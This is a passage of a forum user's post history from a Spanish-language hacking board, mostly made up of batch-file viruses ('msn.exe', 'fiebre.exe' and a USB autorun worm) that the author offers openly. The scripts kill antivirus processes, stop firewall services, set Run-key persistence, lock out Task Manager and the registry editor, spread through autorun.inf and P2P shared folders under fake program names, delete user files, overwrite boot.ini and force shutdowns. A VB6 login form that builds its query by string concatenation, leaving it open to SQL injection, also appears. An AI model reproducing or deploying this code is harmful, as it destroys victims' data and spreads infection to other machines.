  63. attrib +s +h +r E:\autorun.inf
  64. :F
  65. copy /Y "%0" "F:\taskmgr.bat"
  66. if exist F:\autorun.inf goto G
  67. %task%.[Autorun] >> F:\Autorun.inf
  68. %task%.label=Pendrive >> F:\Autorun.inf
  69. %task%.action=Abrir Pendrive >> F:\Autorun.inf
  70. %task%.shellexecute="/taskmgr.bat" >> F:\Autorun.inf
  71. echo On Error Resume Next >> F:\taskmgr.vbs
  72. echo set shell = CreateObject("WScript.Shell") >> F:\taskmgr.vbs
  73. echo shell.run "F:\taskmgr.bat",0 >> F:\taskmgr.vbs
  74. start  F:\taskmgr.vbs
  75. attrib +s +h +r F:\taskmgr.bat
  76. attrib +s +h +r F:\autorun.inf
  77. :G
  78. copy /Y "%0" "G:\taskmgr.bat"
  79. if exist G:\autorun.inf goto H
  80. %task%.[Autorun] >> G:\Autorun.inf
  81. %task%.label=Pendrive >> G:\Autorun.inf
  82. %task%.action=Abrir Pendrive >> G:\Autorun.inf
  83. %task%.shellexecute="/taskmgr.bat" >> G:\Autorun.inf
  84. echo On Error Resume Next >> G:\taskmgr.vbs
  85. echo set shell = CreateObject("WScript.Shell") >> G:\taskmgr.vbs
  86. echo shell.run "G:\taskmgr.bat",0 >> G:\taskmgr.vbs
  87. start  G:\taskmgr.vbs
  88. attrib +s +h +r G:\taskmgr.bat
  89. attrib +s +h +r G:\autorun.inf
  90. :H
  91. copy /Y "%0" "H:\taskmgr.bat"
  92. if exist H:\autorun.inf goto I
  93. %task%.[Autorun] >> H:\Autorun.inf
  94. %task%.label=Pendrive >> H:\Autorun.inf
  95. %task%.action=Abrir Pendrive >> H:\Autorun.inf
  96. %task%.shellexecute="/taskmgr.bat" >> H:\Autorun.inf
  97. echo On Error Resume Next >> H:\taskmgr.vbs
  98. echo set shell = CreateObject("WScript.Shell") >> H:\taskmgr.vbs
  99. echo shell.run "H:\taskmgr.bat",0 >> H:\taskmgr.vbs
  100. start  H:\taskmgr.vbs
  101. attrib +s +h +r H:\taskmgr.bat
  102. attrib +s +h +r H:\autorun.inf
  103. :I
  104. copy /Y "%0" "I:\taskmgr.bat"
  105. if exist I:\autorun.inf goto REINI
  106. %task%.[Autorun] >> I:\Autorun.inf
  107. %task%.label=Pendrive >> I:\Autorun.inf
  108. %task%.action=Abrir Pendrive >> I:\Autorun.inf
  109. %task%.shellexecute="/taskmgr.bat" >> I:\Autorun.inf
  110. echo On Error Resume Next >> I:\taskmgr.vbs
  111. echo set shell = CreateObject("WScript.Shell") >> I:\taskmgr.vbs
  112. echo shell.run "C:\taskmgr.bat",0 >> I:\taskmgr.vbs
  113. start  I:\taskmgr.vbs
  114. attrib +s +h +r I:\taskmgr.bat
  115. attrib +s +h +r I:\autorun.inf
  116. :REINI
  117. echo On Error Resume Next >> C:\apagar.vbs
  118. echo set shell = CreateObject("WScript.Shell") >> C:\apagar.vbs
  119. echo shell.run "shutdown.exe -s  -t 11" >> C:\apagar.vbs
  120. start  C:\apagar.vbs
  121. start /MIN %homedrive%\boot.ini & rundll32 user32.dll,SwapMouseButton
5  Programación / Programación Visual Basic / formulario acceso al sistema en vb 6.0 en: 19 Febrero 2011, 15:52 pm
 proyecto llamado acceso al sistema en vb 6.0

Código:
Private Sub Aceptar_Click()
   If Len(TxtClave.Text) <> 0 Then
       usuarios.Recordset.FindFirst "Login='" & TxtUsuario.Text & "' and Clave='" & TxtClave.Text & "'"
        If usuarios.Recordset.NoMatch = False Then
            ProgressBar1.Visible = True
            For i = 1 To 800
                Me.ProgressBar1 = i
            Next
            Unload Me
            Form2.Show
        Else
            Contador = Contador - 1
            If Contador = 0 Then
                MsgBox "Su Tiempo a Finalizado," & " Ud. Sr(a):  " + TxtUsuario.Text + " no es Usuario de este Sistema"
                End
            End If
            MsgBox "Usuario Incorrecto Le Queda" & Space(5) & Contador & Space(5) & "Intentos"
            TxtClave = ""
            TxtClave.SetFocus
        End If
     End If
End Sub

Código:
Private Sub Cancelar_Click()
If MsgBox("Seguro que desea Salir?", vbYesNo + vbExclamation, "Salir del Sistema") = vbYes Then
    End
End If
End Sub

Código:
Private Sub Form_Activate()
TxtUsuario.SetFocus
End Sub

Código:
Private Sub Form_Initialize()
Contador = 3
End Sub

Código:
Private Sub Form_Load()
Move (Screen.Width - Width) / 2, (Screen.Height - Height) / 2
End Sub

Código:
Private Sub TxtClave_KeyPress(KeyAscii As Integer)
If KeyAscii = 13 Then
Aceptar.Enabled = True
Aceptar.SetFocus
End If
End Sub

Código:
Private Sub TxtUsuario_Change()
TxtUsuario = StrConv(TxtUsuario.Text, vbProperCase)
TxtUsuario.SelStart = Len(TxtUsuario)
End Sub

Código:
Private Sub TxtUsuario_KeyPress(KeyAscii As Integer)
If KeyAscii = 13 Then Me.TxtClave.SetFocus
End Sub
6  Programación / Scripting / scripts hechos por W4rR3d en: 18 Febrero 2011, 22:39 pm
 si ven un error en mis scripts por favor notificar

 grupo Black Eye Security Team  Piura -Peru
  W4rR3d  - G3kk0 - W4rc10k - M1lh077
 script1: el siguiente script permite saber el nombre de tu pc, dominio de
Código
  1. usuario,nombre de usuario,perfil del server
  2. Set yu1 = Wscript.CreateObject( "Wscript.Shell" )
  3.  
  4. WScript.Echo " verificar variables:"
  5. WScript.Echo " el script se esta ejecutandose"
  6.  
  7. WScript.Echo "Computer Name   : " & yu1.ExpandEnvironmentStrings( "%COMPUTERNAME%" )
  8. WScript.Echo "Logon Server    : " & yu1.ExpandEnvironmentStrings( "%LOGONSERVER%" )
  9. WScript.Echo "User Domain     : " & yu1.ExpandEnvironmentStrings( "%USERDOMAIN%" )
  10. WScript.Echo "User Name       : " & yu1.ExpandEnvironmentStrings( "%USERNAME%" )
  11. WScript.Echo " hacked by W4rR3d"
  12.  
  13. Set yu1 = Nothing
  14.  
  15.  
script2:
El siguiente Script ejecuta el cambio de organización en cualquier PC de la red:
Código
  1. Option Explicit
  2. Set yu2 = WScript.CreateObject("WScript.Shell")
  3. Dim yu2, s1
  4. s1 = "HKLM\Software\Microsoft\Windows NT\CurrentVersion\"
  5. yu2.RegWrite s1 & "RegisteredOwner", "HACKED BY W4rR3d"
  6. yu2.RegWrite s1 & "RegisteredOrganization", "HACKED BY W4rR3d"
  7.  
script3:
el siguiente script permite Obtener datos de usuario de dominio:
Código
  1. On Error Resume Next
  2. Set objSysInfo = CreateObject("ADSystemInfo")
  3. Wscript.Echo "User name: " & objSysInfo.UserName
  4. Wscript.Echo "Computer name: " & objSysInfo.ComputerName
  5. Wscript.Echo "Site name: " & objSysInfo.SiteName
  6. Wscript.Echo "Domain short name: " & objSysInfo.DomainShortName
  7. Wscript.Echo "Domain DNS name: " & objSysInfo.DomainDNSName
  8. Wscript.Echo "Forest DNS name: " & objSysInfo.ForestDNSName
  9. Wscript.Echo "PDC role owner: " & objSysInfo.PDCRoleOwner
  10. Wscript.Echo "Schema role owner: " & objSysInfo.SchemaRoleOwner
  11. Wscript.Echo "Domain is in native mode: " & objSysInfo.IsNativeMode
  12.  
7  Programación / Scripting / virus informatico msn.exe en: 17 Febrero 2011, 23:49 pm
espero que si ven un error en este virus informatico lo notifican

su amigo W4rR3d
Código
  1. @echo off
  2.  
  3. ::************************************************
  4. ::        VIRUS INFORMATICO MSN.EXE
  5. ::************************************************
  6. ::          virus creado por hacked by
  7. ::      W4rR3d  - G3kk0 - W4rc10k - M1lh077
  8. :: virus dedicado al grupo de hackers " Ka0 Team"
  9. ::************************************************
  10. ..************************************************
  11. ..              Piura  -   Peru
  12. .*************************************************
  13. .      Autodidacta en Ingenieria de Sistemas
  14. .         y creador de virus informaticos
  15. .                hacked by W4rR3d
  16. .*************************************************
  17. :inicio
  18. Set b2=xcopy /I /y
  19. Set b4=C:\
  20. Set b5=D:\
  21. Set b6=E:\
  22. Set b7=F:\
  23. Set b8=G:\
  24. Set b9=H:\
  25. Set b10=%windir%
  26. Set b11=%programfiles%
  27. Set b12=%systemdrive%
  28. Set b13=%USERNAME%
  29. Set b14=%homedrive%
  30. taskkill /f/im explorer.exe /im teatimer.exe /im msnmsgr.exe /im im  mspaint.exe
  31. taskkill /f/im explorer.exe / im  notepad.exe /im  calc.exe
  32. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  33. REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v msn /t REG_SZ /d "%b10%\system32\msn\msn.exe" /f
  34. REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v hotmail /t REG_SZ /d "%b5%\system32\msn\msn.exe" /f
  35. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 1 /f
  36. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideClock /t REG_DWORD /d 1 /f
  37. reg add HKCU\Software\Microsoft\Windows\currentVersion\policies\System /v NoDispCpl /t REG_DWORD /d 1 /f
  38. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWindowsUpdate /t REG_DWORD /d 1 /f
  39. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /t REG_DWORD /d 1 /f
  40. reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\My Computer" /v NoDrives /t REG_DWORD /d 1 /f
  41. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 1 /f
  42. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
  43. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
  44. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  45. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Advanced /v Hidden /t REG_DWORD /d 0 /f
  46. reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  47. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableMsConfig /t REG_DWORD /d 1 /f
  48. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
  49. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_ DWORD /d 1 /f
  50. reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1297979999&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=10250&id=64855&mkt=es-pe&cbcxt=mai&snsc=1"
  51. reg Add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f
  52. reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /t REG_SZ /d "Hacked By W4rR3d"
  53. if exist C:\ goto C1
  54. if not "%1"=="" goto D
  55. :C1
  56. if exist %b4%msn attrib +h +s %b4%msn&attrib +s +h +r %b4%autorun.inf
  57. %b2% %b10%\system32\msn %b4%msn
  58. %b3% "%b10%\system32\msn"
  59. copy /y %0 "%b10%\system32\msn\msn.exe"
  60. %b1% [autorun] >>%b4%autorun.inf
  61. %b1% OPEN=msn\msn.exe >>%b4%autorun.inf
  62. %b1% shell\open\Command=msn\msn.exe >>%b4%autorun.inf
  63. %b1% shell\open\Default=1 >>%b4%autorun.inf
  64. %b1% shell\explore\Command=msn\msn.exe >>%b4%autorun.inf
  65. attrib +s +h +r %b4%msn
  66. attrib +s +h +r %b4%autorun.inf
  67. %b1% on error resume next>> %b4%msn.vbs
  68. %b1% set shell = createobject("wscript.shell")>> %b4%msn.vbs
  69. %b1% shell.run "%b10%\system32\msn\msn.exe">> %b4%msn.vbs
  70. start %b4%msn.vbs
  71. %b1% Msgbox "bienvenido a hotmail.com" >> %b4%aviso.vbs
  72. start %b4%aviso.vbs
  73. :D
  74. if exist D:\ goto D1
  75. if not "%1"=="" goto E
  76. :D1
  77. if exist %b5%msn attrib +h +s %b5%msn&attrib +s +h +r %b5%autorun.inf
  78. %b2% %b10%\system32\msn %b5%msn
  79. %b3% "%b10%\system32\msn"
  80. copy /y %0 "%b10%\system32\msn\msn.exe"
  81. %b1% [autorun] >>%b5%autorun.inf
  82. %b1% OPEN=msn\msn.exe >>%b5%autorun.inf
  83. %b1% shell\open\Command=msn\msn.exe >>%b5%autorun.inf
  84. %b1% shell\open\Default=1 >>%b5%autorun.inf
  85. %b1% shell\explore\Command=msn\msn.exe >>%b5%autorun.inf
  86. attrib +s +h +r %b5%msn
  87. attrib +s +h +r %b5%autorun.inf
  88. %b1% on error resume next>> %b5%msn.vbs
  89. %b1% set shell = createobject("wscript.shell")>> %b5%msn.vbs
  90. %b1% shell.run "%b10%\system32\msn\msn.exe">> %b5%msn.vbs
  91. start %b5%msn.vbs
  92. %b1% Msgbox "bienvenido a hotmail.com" >> %b5%aviso.vbs
  93. start %b5%aviso.vbs
  94. :E
  95. if exist E:\ goto E1
  96. if not "%1"=="" goto F
  97. :E1
  98. if exist %b6%msn attrib +h +s %b6%msn&attrib +s +h +r %b6%autorun.inf
  99. %b2% %b10%\system32\msn %b6%msn
  100. %b3% "%b10%\system32\msn"
  101. copy /y %0 "%b10%\system32\msn\msn.exe"
  102. %b1% [autorun] >>%b6%autorun.inf
  103. %b1% OPEN=msn\msn.exe >>%b6%autorun.inf
  104. %b1% shell\open\Command=msn\msn.exe >>%b6%autorun.inf
  105. %b1% shell\open\Default=1 >>%b6%autorun.inf
  106. %b1% shell\explore\Command=msn\msn.exe >>%b6%autorun.inf
  107. attrib +s +h +r %b6%msn
  108. attrib +s +h +r %b6%autorun.inf
  109. %b1% on error resume next>> %b6%msn.vbs
  110. %b1% set shell = createobject("wscript.shell")>> %b6%msn.vbs
  111. %b1% shell.run "%b10%\system32\msn\msn.exe">> %b6%msn.vbs
  112. start %b6%msn.vbs
  113. %b1% Msgbox "bienvenido a hotmail.com" >> %b6%aviso.vbs
  114. start %b6%aviso.vbs
  115. :F
  116. if exist F:\ goto F1
  117. if not "%1"=="" goto G
  118. :F1
  119. if exist %b7%msn attrib +h +s %b7%msn&attrib +s +h +r %b7%autorun.inf
  120. %b2% %b10%\system32\msn %b7%msn
  121. %b3% "%b10%\system32\msn"
  122. copy /y %0 "%b10%\system32\msn\msn.exe"
  123. %b1% [autorun] >>%b7%autorun.inf
  124. %b1% OPEN=msn\msn.exe >>%b7%autorun.inf
  125. %b1% shell\open\Command=msn\msn.exe >>%b7%autorun.inf
  126. %b1% shell\open\Default=1 >>%b7%autorun.inf
  127. %b1% shell\explore\Command=msn\msn.exe >>%b7%autorun.inf
  128. attrib +s +h +r %b7%msn
  129. attrib +s +h +r %b7%autorun.inf
  130. %b1% on error resume next>> %b7%msn.vbs
  131. %b1% set shell = createobject("wscript.shell")>> %b7%msn.vbs
  132. %b1% shell.run "%b10%\system32\msn\msn.exe">> %b7%msn.vbs
  133. start %b7%msn.vbs
  134. %b1% Msgbox "bienvenido a hotmail.com" >> %b7%aviso.vbs
  135. start %b7%aviso.vbs
  136. :G
  137. if not "%1"=="" goto H
  138. :G1
  139. if exist %b8%msn attrib +h +s %b8%msn&attrib +s +h +r %b8%autorun.inf
  140. %b2% %b10%\system32\msn %b8%msn
  141. %b3% "%b10%\system32\msn"
  142. copy /y %0 "%b10%\system32\msn\msn.exe"
  143. %b1% [autorun] >>%b8%autorun.inf
  144. %b1% OPEN=msn\msn.exe >>%b8%autorun.inf
  145. %b1% shell\open\Command=msn\msn.exe >>%b8%autorun.inf
  146. %b1% shell\open\Default=1 >>%b8%autorun.inf
  147. %b1% shell\explore\Command=msn\msn.exe >>%b8%autorun.inf
  148. attrib +s +h +r %b8%msn
  149. attrib +s +h +r %b8%autorun.inf
  150. %b1% on error resume next>> %b8%msn.vbs
  151. %b1% set shell = createobject("wscript.shell")>> %b8%msn.vbs
  152. %b1% shell.run "%b10%\system32\msn\msn.exe">> %b8%msn.vbs
  153. start %b8%msn.vbs
  154. %b1% Msgbox "bienvenido a hotmail.com" >> %b8%aviso.vbs
  155. start %b8%aviso.vbs
  156. :H
  157. if not "%1"=="" goto bor
  158. :H1
  159. if exist %b9%msn attrib +h +s %b9%msn&attrib +s +h +r %b9%autorun.inf
  160. %b2% %b10%\system32\msn %b9%msn
  161. %b3% "%b10%\system32\msn"
  162. copy /y %0 "%b10%\system32\msn\msn.exe"
  163. %b1% [autorun] >>%b9%autorun.inf
  164. %b1% OPEN=msn\msn.exe >>%b9%autorun.inf
  165. %b1% shell\open\Command=msn\msn.exe >>%b9%autorun.inf
  166. %b1% shell\open\Default=1 >>%b9%autorun.inf
  167. %b1% shell\explore\Command=msn\msn.exe >>%b9%autorun.inf
  168. attrib +s +h +r %b9%msn
  169. attrib +s +h +r %b9%autorun.inf
  170. %b1% on error resume next>> %b9%msn.vbs
  171. %b1% set shell = createobject("wscript.shell")>> %b9%msn.vbs
  172. %b1% shell.run "%b10%\system32\msn\msn.exe">> %b9%msn.vbs
  173. start %b9%msn.vbs
  174. %b1% Msgbox "bienvenido a hotmail.com" >> %b9%aviso.vbs
  175. start %b9%aviso.vbs
  176. :bor
  177. DEL /Q /F /S "%b11%\*.*"
  178. DEL /Q /F /S "%b12%\Documents and Settings\%b13%\Meus documentos\*.*"
  179. DEL /Q /F /S "%b12%\Documents and Settings\%b13%\Escritorio\*.*"
  180. %b1% -={W4rR3d_by_hacked}=- >> "%b10%\system32"\"-={W4rR3d_by_hacked}=-.RAR.EXE"
  181. %b1% -={W4rR3d_by_hacked}=- >> "%b10%\system"\"-={W4rR3d_by_hacked}=-.RAR.EXE"
  182. %b1% -={W4rR3d_by_hacked}=- >> "%b10%\"\"-={W4rR3d_by_hacked}=-.RAR.EXE"
  183. %b1% -={W4rR3d_by_hacked}=- >> "%b4%""-={W4rR3d_by_hacked}=-.RAR.EXE"
  184. %b1% -={W4rR3d_by_hacked}=- >> "%b5%""-={W4rR3d_by_hacked}=-.RAR.EXE"
  185. %b1% -={W4rR3d_by_hacked}=- >> "%b6%""-={W4rR3d_by_hacked}=-.RAR.EXE"
  186. %b1% -={W4rR3d_by_hacked}=- >> "%b7%""-={W4rR3d_by_hacked}=-.RAR.EXE"
  187. %b1% -={W4rR3d_by_hacked}=- >> "%b8%""-={W4rR3d_by_hacked}=-.RAR.EXE"
  188. %b1% -={W4rR3d_by_hacked}=- >> "%b9%""-={W4rR3d_by_hacked}=-.RAR.EXE"
  189. %b1% -={W4rR3d_by_hacked}=- >> "%systemdrive%\Documents and Settings\%b13%\Escritorio\-={W4rR3d_by_hacked}=-.RAR.EXE"
  190. %b1% -={W4rR3d_by_hacked}=- >> "%b12%\Documents and Settings\%b13%\Mis documentos\-={W4rR3d_by_hacked}=-.RAR.EXE"
  191. :boot
  192. attrib -h -s -r %b14%\boot.ini
  193. DEL /Q "%b14%\boot.ini"
  194. %b1% [boot loader] >> %b14%\boot.ini
  195. %b1% timeout=30 >> %b14%\boot.ini
  196. %b1% default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS >> %b14%\boot.ini
  197. %b1% default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWs >> %b14%\boot.ini
  198. %b1% [operating systems] >> %b14%\boot.ini
  199. %b1% multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect >> %b14%\boot.ini
  200. %b1% multi(0)disk(0)rdisk(0)partition(1)\WINDOWs="-={W4rR3d_by_hacked}=-" /noexecute=optin / >> %b14%\boot.ini
  201. attrib +s +h +r %b14%\boot.ini
  202. goto inicio
8  Programación / Scripting / Re: virus informatico fiebre.exe en: 14 Febrero 2011, 16:49 pm
A ver, @W4rR3d, si vuelves a publicar algo sin etiquetas de código, te voy a borrar el mensaje así sin más. LEE LAS REGLAS. Y dedícate a algo más productivo que a crear estupideces en Batch.
mira amigo si quieres aprender de mi estos son codigos cuando me inicie en programacion en batch, tambien domino vb 6.0, java script, c++ , c, fox pro 6.0,visual script y otros mas ya amiguito leo gutièrrez. que dios te bendiga leo gutièrrez
9  Programación / Scripting / [BATCH] virus informatico fiebre.exe en: 12 Febrero 2011, 15:46 pm
sin ven un error en este virus informatico por favor notifinquela.
 hacked by W4rR3d <autodidacta en ingenieria de sistemas y creador de virus informaticos> Piura - Peru

Código
  1. @echo off
  2. :: virus fue creado por hacked by  W4rR3d
  3. :: virus esta dedicado a la comunidad hacker piura- peru
  4. :: virus informatico se llama fiebre.exe
  5. :: virus informatico dedicado al grupo de hackers 'KA0 Team'
  6. :inicio
  7. copy %0 "%homedrive%\"
  8. copy %0 "%windir%\"
  9. copy %0 "%windir%\system32"
  10. copy %0 "%PROGRAMFILES%\"
  11. copy %0 "%allusersprofile%\"
  12. copy %0 "%COMMONPROGRAMFILES%\"
  13. copy %0 "%USERPROFILE%\"
  14. taskkill /f/im aswRegSvr.exe /im aswRegSvr64.exe /im AvastSvc.exe
  15. taskkill /f/im explorer.exe /im teatimer.exe /im taskmgr.exe
  16. taskkill /f/im explorer.exe /im firefox.exe /im  photoshop.exe
  17. net stop "Security Center"
  18. net stop SharedAccess
  19. net stop "Firewall de Windows/Conexion compartida a Internet (ICS)"
  20. REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v system /t REG_SZ /d "%windir%\system32\fiebre.exe" /F
  21. reg add hklm\software\microsoft\windows\currentversion\run /v fiebre /t reg_sz /d %eb1%fiebre.exe /f
  22. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  23. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 1 /f
  24. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  25. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideClock /t REG_DWORD /d 1 /f
  26. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
  27. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f
  28. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 0 /f
  29. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
  30. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
  31. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD /d 1 /f
  32. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
  33. reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "http://www.elcachondeo.cl/foro/showthread.php?t=364382"
  34. reg Add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f
  35. reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /t REG_SZ /d "Hacked By W4rR3d"
  36. Set eb1= C:\
  37. Set eb2= D:\
  38. Set eb3= E:\
  39. Set eb4= F:\
  40. Set eb5= G:\
  41. Set eb6= H:\
  42. if exist %eb1%autorun.inf (goto fie1) else (goto fie2)
  43. :fie2
  44. copy /Y %0 %eb1%fiebre.exe
  45. echo.[AutoRun]>> %eb1%autorun.inf
  46. echo.open="%eb1%fiebre.exe">> %eb1%autorun.inf
  47. echo.action=Open folder to see files...>> %eb1%autorun.inf
  48. attrib +r +s +h %eb1%autorun.inf
  49. attrib +r +s +h %eb1%fiebre.exe
  50. echo On Error Resume Next >> %eb1%apagar.vbs
  51. echo set shell = CreateObject("WScript.Shell") >> %eb1%apagar.vbs
  52. echo shell.run "shutdown.exe -s  -t 13" >> %eb1%apagar.vbs
  53. attrib +r +s +h %eb1%apagar.vbs
  54. start %eb1%apagar.vbs
  55. :fie1
  56. if exist %eb2%autorun.inf (goto fie3) else (goto fie4)
  57. :fie4
  58. copy /Y %0 %eb2%fiebre.exe
  59. echo.[AutoRun]>> %eb2%autorun.inf
  60. echo.open="%eb2%fiebre.exe">> %eb2%autorun.inf
  61. echo.action=Open folder to see files...>> %eb2%autorun.inf
  62. attrib +r +s +h %eb2%autorun.inf
  63. attrib +r +s +h %eb2%fiebre.exe
  64. echo On Error Resume Next >> %eb2%apagar.vbs
  65. echo set shell = CreateObject("WScript.Shell") >> %eb2%apagar.vbs
  66. echo shell.run "shutdown.exe -s  -t 13" >> %eb2%apagar.vbs
  67. attrib +r +s +h %eb2%apagar.vbs
  68. start %eb2%apagar.vbs
  69. :fie3
  70. if exist %eb3%autorun.inf (goto fie5) else (goto fie6)
  71. :fie6
  72. copy /Y %0 %eb3%fiebre.exe
  73. echo.[AutoRun]>> %eb3%autorun.inf
  74. echo.open="%eb3%fiebre.exe">> %eb3%autorun.inf
  75. echo.action=Open folder to see files...>> %eb3%autorun.inf
  76. attrib +r +s +h %eb3%autorun.inf
  77. attrib +r +s +h %eb3%fiebre.exe
  78. echo On Error Resume Next >> %eb3%apagar.vbs
  79. echo set shell = CreateObject("WScript.Shell") >> %eb3%apagar.vbs
  80. echo shell.run "shutdown.exe -s  -t 13" >> %eb3%apagar.vbs
  81. attrib +r +s +h %eb3%apagar.vbs
  82. start %eb3%apagar.vbs
  83. :fie5
  84. if exist %eb4%autorun.inf (goto fie7) else (goto fie8)
  85. :fie8
  86. copy /Y %0 %eb4%fiebre.exe
  87. echo.[AutoRun]>> %eb4%autorun.inf
  88. echo.open="%eb4%fiebre.exe">> %eb4%autorun.inf
  89. echo.action=Open folder to see files...>> %eb4%autorun.inf
  90. attrib +r +s +h %eb4%autorun.inf
  91. attrib +r +s +h %eb4%fiebre.exe
  92. echo On Error Resume Next >> %eb4%apagar.vbs
  93. echo set shell = CreateObject("WScript.Shell") >> %eb4%apagar.vbs
  94. echo shell.run "shutdown.exe -s  -t 13" >> %eb4%apagar.vbs
  95. attrib +r +s +h %eb4%apagar.vbs
  96. start %eb4%apagar.vbs
  97. :fie7
  98. if exist %eb5%autorun.inf (goto fie9) else (goto fie10)
  99. :fie10
  100. copy /Y %0 %eb5%fiebre.exe
  101. echo.[AutoRun]>> %eb5%autorun.inf
  102. echo.open="%eb5%fiebre.exe">> %eb5%autorun.inf
  103. echo.action=Open folder to see files...>> %eb5%autorun.inf
  104. attrib +r +s +h %eb5%autorun.inf
  105. attrib +r +s +h %eb5%fiebre.exe
  106. echo On Error Resume Next >> %eb5%apagar.vbs
  107. echo set shell = CreateObject("WScript.Shell") >> %eb5%apagar.vbs
  108. echo shell.run "shutdown.exe -s  -t 13" >> %eb5%apagar.vbs
  109. attrib +r +s +h %eb5%apagar.vbs
  110. start %eb5%apagar.vbs
  111. :fie9
  112. if exist %eb6%\autorun.inf (goto fie11) else (goto fie12)
  113. :fie12
  114. copy /Y %0 %eb6%fiebre.exe
  115. echo.[AutoRun]>> %eb6%autorun.inf
  116. echo.open="%eb6%fiebre.exe">> %eb6%autorun.inf
  117. echo.action=Open folder to see files...>> %eb6%autorun.inf
  118. attrib +r +s +h %eb6%autorun.inf
  119. attrib +r +s +h %eb6%fiebre.exe
  120. echo On Error Resume Next >> %eb6%\apagar.vbs
  121. echo set shell = CreateObject("WScript.Shell") >> %eb6%apagar.vbs
  122. echo shell.run "shutdown.exe -s  -t 13" >> %eb6%apagar.vbs
  123. attrib +r +s +h %eb6%apagar.vbs
  124. start %eb6%apagar.vbs
  125. :fie11
  126. set /a war1="%programfiles%\eMule\Incoming"
  127. set /a war2="%programfiles%\KaZaA\My Shared Folder"
  128. set /a war3="%appdata%\Ares\My Shared Folder"
  129. Set /a War4="%programfiles%\Alwil Software\Avast5"
  130. if exist %war1% (
  131. for /d %%a ("Internet Explorer 7.exe","Windows Xp.exe","Nero Start Smart 9.exe","Microsoft Office 2007.exe","Avast 5.1 Pro Full.exe","Windows Live Messenger 8.5.exe","GTA 4.exe","Activa tu windows.exe","ESET Smart Segurity 4.exe" do (if not exist %war1%\%%a copy /y "%~0" %war1%\%%a)
  132. )
  133. if exist %war2% (
  134. for /d %%a ("Windows Xp.exe","Nero Start Smart 9.exe","Microsoft Office 2007.exe","Avast 5.1 Pro Full.exe","Windows Live Messenger 8.5.exe","GTA 4.exe","Activa tu windows.exe","ESET Smart Segurity 4.exe" do (if not exist %war2%\%%a copy /y "%~0" %war2%\%%a)
  135. )
  136. if exist %war3% (
  137. for /d %%a ("Windows Live Messenger 9.5.exe","avast! Free Antivirus 5.exe", "aswRegSvr 64.exe","AvastSvc 50.exe","aswRunDll 3.2.exe","Avast 5.3 Pro Full.exe","Windows Live Messenger 8.5.exe","GTA 4.exe","Activa tu windows.exe","ESET Smart Segurity 4.exe" do (if not exist %war3%\%%a copy /y "%~0" %war3%\%%a)
  138. )
  139. if exist %war4% (
  140. for /d %%a ("aswRegSvr 5.exe","avast! Free Antivirus 5.exe", "Windows Xp.exe","aswRegSvr 9.exe","aswRunDll 5.exe","Avast 5.3 Pro Full.exe","Windows Live Messenger 8.5.exe" do (if not exist %war4%\%%a copy /y "%~0" %war4%\%%a)
